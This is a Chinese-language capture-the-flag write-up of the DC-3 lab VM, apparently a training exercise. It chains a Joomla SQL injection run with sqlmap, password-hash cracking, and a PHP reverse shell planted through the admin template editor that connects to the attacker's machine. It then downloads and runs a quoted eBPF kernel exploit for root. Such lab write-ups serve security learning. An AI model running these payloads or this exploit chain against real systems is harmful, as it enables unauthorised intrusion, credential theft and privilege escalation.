修改錯誤配置
打開了ova文件會發現,怎么也找不到DC-3的ip地址,估計是網卡出了問題。
那么就先配置下網卡。
進入上面這個頁面之前按e。
將這里的ro 替換為 rw signie init=/bin/bash
按下Ctrl鍵+X鍵進入命令行
查看當前網卡IP信息 ip a,網卡名ens33
編輯網卡配置文件vim /etc/network/interfaces(原先的網卡名不一致)
重啟網卡服務/etc/init.d/networking restart,在看看ip a
可以看到已經有ip了。
信息搜集
nmap -sP 192.168.146.0/24 #主機發現
nmap -A 192.168.146.0/24 #掃描
掃描看下是什么cms
python3 cmseek.py -u 192.168.146.145 #github上有
這里寫沒有檢測到核心漏洞,那我們google一下看看有沒有別的漏洞。
https://www.exploit-db.com/exploits/42033
自己測一下這個網站發現確實有sql注入。
http://192.168.146.145/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=1
http://192.168.146.145/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=1%27
詳細鏈接:https://www.anquanke.com/post/id/86119
getFlag
發現了sql注入漏洞,直接上sqlmap把
sqlmap -u "http://192.168.146.145/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] #爆表庫
sqlmap -u "http://192.168.146.145/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --dbms mysql -D joomladb --tables #爆表
sqlmap -u "http://192.168.146.145/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --dbms mysql -D joomladb -T '#__users' --columns #爆列
sqlmap -u "http://192.168.146.145/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --dbms mysql -D joomladb -T '#__users' -C id,name,password,username --dump #爆字段
管理員加密后的密碼:$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu。
那下面思路就是看看能不能破解這個密碼了。
這里有兩個選擇kali的john或者johnny,前者是命令行后者是可視化界面。兩個都用用吧。
拿到admin賬號密碼就登陸進去看看。
發現沒什么東西,應該是要從后台進入。我們剛剛已經掃描出了后台目錄。http://192.168.146.145/administrator/
看到Extensions-Templates處有很多php文件
直接新建一個php文件,找到文件的目錄測試一下。
找到目錄http://192.168.146.145/templates/protostar/A1oe.php
成功執行代碼。那么接下來直接反彈shell。
<?php
$sock=fsockopen('192.168.146.132',4444);
$descriptorspec=array(
0=>$sock,
1=>$sock,
2=>$sock
);
$process=proc_open('sh',$descriptorspec,$pipes);
proc_close($process);
echo phpinfo();
?>
再使用nc -lvvp 4444來監聽,然后訪問http://192.168.146.145/templates/protostar/A1oe.php得到shell
看一眼linux的版本/etc/*-release
ubuntu 16.04是有內核漏洞可以直接提權的,searchspolit找一下看看能不能直接用。
在看看kernel的版本 uname -a
選擇一個對應的試試,我這里選擇的是39772.txt
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=808
In Linux >=4.4, when the CONFIG_BPF_SYSCALL config option is set and the
kernel.unprivileged_bpf_disabled sysctl is not explicitly set to 1 at runtime,
unprivileged code can use the bpf() syscall to load eBPF socket filter programs.
These conditions are fulfilled in Ubuntu 16.04.
When an eBPF program is loaded using bpf(BPF_PROG_LOAD, ...), the first
function that touches the supplied eBPF instructions is
replace_map_fd_with_map_ptr(), which looks for instructions that reference eBPF
map file descriptors and looks up pointers for the corresponding map files.
This is done as follows:
/* look for pseudo eBPF instructions that access map FDs and
* replace them with actual map pointers
*/
static int replace_map_fd_with_map_ptr(struct verifier_env *env)
{
struct bpf_insn *insn = env->prog->insnsi;
int insn_cnt = env->prog->len;
int i, j;
for (i = 0; i < insn_cnt; i++, insn++) {
[checks for bad instructions]
if (insn[0].code == (BPF_LD | BPF_IMM | BPF_DW)) {
struct bpf_map *map;
struct fd f;
[checks for bad instructions]
f = fdget(insn->imm);
map = __bpf_map_get(f);
if (IS_ERR(map)) {
verbose("fd %d is not pointing to valid bpf_map\n",
insn->imm);
fdput(f);
return PTR_ERR(map);
}
[...]
}
}
[...]
}
__bpf_map_get contains the following code:
/* if error is returned, fd is released.
* On success caller should complete fd access with matching fdput()
*/
struct bpf_map *__bpf_map_get(struct fd f)
{
if (!f.file)
return ERR_PTR(-EBADF);
if (f.file->f_op != &bpf_map_fops) {
fdput(f);
return ERR_PTR(-EINVAL);
}
return f.file->private_data;
}
The problem is that when the caller supplies a file descriptor number referring
to a struct file that is not an eBPF map, both __bpf_map_get() and
replace_map_fd_with_map_ptr() will call fdput() on the struct fd. If
__fget_light() detected that the file descriptor table is shared with another
task and therefore the FDPUT_FPUT flag is set in the struct fd, this will cause
the reference count of the struct file to be over-decremented, allowing an
attacker to create a use-after-free situation where a struct file is freed
although there are still references to it.
A simple proof of concept that causes oopses/crashes on a kernel compiled with
memory debugging options is attached as crasher.tar.
One way to exploit this issue is to create a writable file descriptor, start a
write operation on it, wait for the kernel to verify the file's writability,
then free the writable file and open a readonly file that is allocated in the
same place before the kernel writes into the freed file, allowing an attacker
to write data to a readonly file. By e.g. writing to /etc/crontab, root
privileges can then be obtained.
There are two problems with this approach:
The attacker should ideally be able to determine whether a newly allocated
struct file is located at the same address as the previously freed one. Linux
provides a syscall that performs exactly this comparison for the caller:
kcmp(getpid(), getpid(), KCMP_FILE, uaf_fd, new_fd).
In order to make exploitation more reliable, the attacker should be able to
pause code execution in the kernel between the writability check of the target
file and the actual write operation. This can be done by abusing the writev()
syscall and FUSE: The attacker mounts a FUSE filesystem that artificially delays
read accesses, then mmap()s a file containing a struct iovec from that FUSE
filesystem and passes the result of mmap() to writev(). (Another way to do this
would be to use the userfaultfd() syscall.)
writev() calls do_writev(), which looks up the struct file * corresponding to
the file descriptor number and then calls vfs_writev(). vfs_writev() verifies
that the target file is writable, then calls do_readv_writev(), which first
copies the struct iovec from userspace using import_iovec(), then performs the
rest of the write operation. Because import_iovec() performs a userspace memory
access, it may have to wait for pages to be faulted in - and in this case, it
has to wait for the attacker-owned FUSE filesystem to resolve the pagefault,
allowing the attacker to suspend code execution in the kernel at that point
arbitrarily.
An exploit that puts all this together is in exploit.tar. Usage:
user@host:~/ebpf_mapfd_doubleput$ ./compile.sh
user@host:~/ebpf_mapfd_doubleput$ ./doubleput
starting writev
woohoo, got pointer reuse
writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.
suid file detected, launching rootshell...
we have root privs now...
root@host:~/ebpf_mapfd_doubleput# id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare),999(vboxsf),1000(user)
This exploit was tested on a Ubuntu 16.04 Desktop system.
Fix: https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=8358b02bf67d3a5d8a825070e1aa73f25fb2e4c7
Proof of Concept: https://bugs.chromium.org/p/project-zero/issues/attachment?aid=232552
Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip
如下方式使用
root@kali:~/tmp# wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip #下載zip
root@kali:~/tmp# unzip * #解壓zip
root@kali:~/tmp# cd 39772/ #訪問目錄
然后上傳解壓,又或者靶機直接wget下載(傳到滲透機的web目錄下)。
tar xvf exploit.tar #解壓
bash compile.sh
ls
./doubleput
總結
這次靶機比較坑...下載ova文件打開根本找不到靶機的ip地址,然后下載了vm專用的,然而我是vm workstation也用不了...個人又不想去下載其他的軟件,所以就晾了一段時間。
后面上網查詢資料,加上自己的摸索發現應該是網卡的配置出了問題導致的無法獲取ip地址,由此來逐步解決。
學習的內容的話,學到了兩個爆破密碼的工具john+johnny。然后是好像玩DC系列以來,第一次使用內核漏洞提權。(刺激.jpg